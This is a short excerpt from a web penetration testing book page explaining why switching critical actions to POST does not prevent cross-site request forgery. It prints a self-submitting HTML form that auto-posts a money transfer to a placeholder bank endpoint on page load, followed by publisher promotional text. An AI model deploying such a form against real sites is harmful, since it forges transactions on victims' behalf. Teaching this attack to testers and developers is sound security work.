Exploiting POST-request based CSRF

As we discussed before, developers often make the mistake of moving to POST requests for critical actions, based on a website, by changing actions into forms while assuming that a form's POST request will not get forged. But in reality this can be very well forged—in this case the attacker uses a self-submitting form to accomplish the same.

A self-submitting form hosted by an attacker looks like the following:

<html>
  <head>
  </head>
  <body onload=document.getElementById('xsrf').submit()>
    <form id='xsrf' method="post" action=" https://bank.example.com/transfer/money">
      <input type='hidden' name='username' value='John'>
      </input>
      <input type='hidden' name='amount' value='500'>
      </input>
    </form>
</body>
</html>

The preceding ...

Get Mastering Modern Web Penetration Testing now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.

Start your free trial

Mastering Modern Web Penetration Testing by Prakhar Prasad

Exploiting POST-request based CSRF

Don’t leave empty-handed

It’s yours, free.

Check it out now on O’Reilly